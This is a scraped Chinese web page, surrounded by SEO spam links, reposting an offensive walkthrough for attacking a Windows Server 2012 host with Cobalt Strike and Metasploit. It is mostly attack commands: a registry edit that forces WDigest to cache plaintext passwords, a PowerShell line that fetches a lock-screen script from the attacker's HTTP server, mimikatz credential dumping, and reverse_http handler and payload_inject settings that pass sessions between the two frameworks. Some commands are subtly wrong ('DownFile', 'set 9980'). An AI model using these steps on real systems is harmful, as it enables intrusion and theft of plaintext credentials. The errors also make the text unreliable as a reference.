当前位置: 首页 > news >正文

做网站的书籍快排seo排名软件

做网站的书籍,快排seo排名软件,网页设计实训报告1200,品牌打造cs与msf权限传递以及mimikatz抓取win2012明文密码 使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上 1.cs生成木马并使目标服务器中马 建立监听生成木马 2.抓取目标主机的明文密码 通过修改注册表来让Wdigest Auth保存明文口令 shell …

cs与msf权限传递以及mimikatz抓取win2012明文密码

使用Cobalt Strike抓取win2012明文密码,将会话传递到Metasploit Framework上

1.cs生成木马并使目标服务器中马

建立监听生成木马

2.抓取目标主机的明文密码

通过修改注册表来让Wdigest Auth保存明文口令

shell reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f

编写一个强制锁屏脚本

Function Lock-WorkStation {
 
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
 
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
 
$LockWorkStation::LockWorkStation() | Out-Null
 
}
 
Lock-WorkStation

在锁屏脚本目录下开启http服务器,控制目标服务器下载并执行锁屏脚本

shell powershell (new-object System.Net.WebClient).DownFile('http://192.168.17.132:9999/lock-screen.ps1','c:\lock-screen.ps1') #下载锁屏脚本
shell powershell c:\lock-screen.ps1 #执行锁屏脚本

管理员重新登录后再抓取明文密码

logonpasswords

cs抓取成功

3.打开Metasploit Framework

调用 exploit/multi/handler 模块配置 HTTP Payload,为该 payload 的 IP 和 端口设置成 Metasploit Framework 所在主机 IP,端口自定义即可。

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set 9980
run

4.在Cobalt Strike 上创建一个Foreign HTTP的监听

成功将cs的会话传递到msf上了

mimikatz抓取win2012明文密码

1.msf生成木马文件使服务器中马

shell #进入cmd窗口
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f #修改注册表
powershell  #进入powershell
c:\lock-screen.ps1 #运行强制锁屏脚本

上传mimikatz启动mimikatz获取明文密码

execute -i -f mimikatz.exe
sekurlsa::logonpasswords

这样mimikatz就抓取到了win2012的明文密码。

创建一个监听

background 
use exploit/windows/local/payload_inject 
set payload windows/meterpreter/reverse_http
set lhost 192.168.17.132
set lport 8899
set disablepayloadhandler true
set prependmigrate true
set session 2 #根据自己的session值
exploit成功将msf的会话传递到cs上了。

http://www.tj-hxxt.cn/news/79277.html

相关文章:

  • 好康的网站代码广州新闻报道
  • wordpress参数传递的函数网页优化方法
  • 做色情网站的人是怎么被抓的西安网站seo费用
  • 个人主页网站设计代码好看的seo网站
  • 老板合作网站开发seo检测
  • 织梦做单页面网站如何做一个自己的网站
  • 新疆生产建设兵团领导班子本地网络seo公司
  • 河间做网站做app推广去哪找商家
  • 做喷绘可以在那个网站找搜索引擎优化的重要性
  • 做网站会什么最新推广方法
  • 网站区域名是什么国家免费职业培训平台
  • 网站域名属于哪里管新东方厨师学费价目表
  • 网站建设完善方案做推广的都是怎么推
  • 哪些网站做彩票预测途径今日最新重大新闻
  • 怎么看网站使用什么做的网店运营工作内容
  • 网站平台需要做无形资产吗 怎么做6seo基础知识
  • 西宁网站建设哪家强app推广注册接单平台
  • php网站怎么做seo百度关键词下拉有什么软件
  • 杭州注册公司代办费用高级seo课程
  • 兰州网站建设企业宣传片制作
  • 贵州省网站集约化建设滕州网站建设优化
  • 网站网页策略上海网站排名seo公司哪家好
  • 甘肃路桥建设集团网站系统优化软件哪个好
  • 什么网站可以找到做餐饮的会计网站批量查询
  • 做学校网站需要备案么微信推广软件有哪些
  • 如何seo网站推广做百度推广的网络公司广州
  • asp连接数据库做登录网站完整下载百度云登录首页
  • 如何快速做企业网站包括商城找平台推广
  • 红色旅游网页设计东莞网站推广及优化
  • 培训行业网站建设是什么广告投放渠道有哪些